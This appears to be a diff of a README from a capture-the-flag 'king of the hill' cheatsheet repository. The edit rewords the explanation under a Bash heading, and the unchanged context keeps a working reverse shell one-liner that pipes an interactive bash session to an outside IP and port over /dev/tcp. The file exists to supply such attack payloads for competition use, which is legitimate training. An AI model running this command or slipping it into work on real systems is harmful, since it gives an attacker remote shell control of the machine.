pform-se/pform-ctf-koth-cheatsheet/README.md

 <h2>Bash</h2>

-Use this if you have direct access to commands like whoami.
+Use this if you have direct access to console commands like whoami.

 <code>/bin/bash -i >& /dev/tcp/10.10.10.10/5555</code>